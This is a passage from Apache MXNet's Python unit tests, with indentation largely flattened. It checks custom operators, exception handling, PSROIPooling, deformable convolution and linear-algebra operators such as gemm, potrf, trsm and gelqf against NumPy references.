aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
    # test backward compatibility, i.e. that the default storage-type inference
    # in custom operators still behaves correctly
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
    # test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# For now there is only a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
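# Illustration only (the helper name below is hypothetical and not used by the
# tests): the re-sampling loop above amounts to rejecting any sampling coordinate
# that lies within eps of an integer grid line, where bilinear interpolation has
# a kink and is therefore not differentiable.
def _is_bilinear_differentiable(coord, eps=1e-3):
    # Differentiable if the coordinate is at least eps away from both the
    # nearest lower and upper integer grid lines.
    return (coord - math.floor(coord)) >= eps and (math.ceil(coord) - coord) >= eps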
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check that the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# For now there is only a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for a different axis that describes the matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
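# Reference for the checks above (documentation only): linalg.gemm and linalg.gemm2
# are exercised against
#   gemm(A, B, C)  ~  alpha * dot(op(A), op(B)) + beta * C
#   gemm2(A, B)    ~  alpha * dot(op(A), op(B))
# where op() optionally transposes the two matrix axes, and the batch/axis cases
# reshape the same 2-D data into (3, 1, m, n) blocks via rep_3x.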
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
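# NumPy analogue of the symbol above (illustration only, not used by the tests):
# averaging an array with its transpose over the last two axes makes those axes
# symmetric, which is what the potrf/syevd inputs below rely on.
def _np_make_symm(a):
    axes = list(range(a.ndim))
    axes[-1], axes[-2] = a.ndim - 2, a.ndim - 1
    return 0.5 * (a + np.transpose(a, axes=axes))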
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
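# For comparison (illustration only): in plain NumPy the same masking is simply
# np.tril / np.triu applied to the last two axes; the symbol above builds the mask
# explicitly from one_hot/concat because it has to operate on mx.sym inputs.
def _np_triangle(a, lower=True):
    return np.tril(a) if lower else np.triu(a)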
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If the unused output is left dangling, things break for dtype=np.float64:
# the backward gradient for the unused output then comes back as np.float32.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
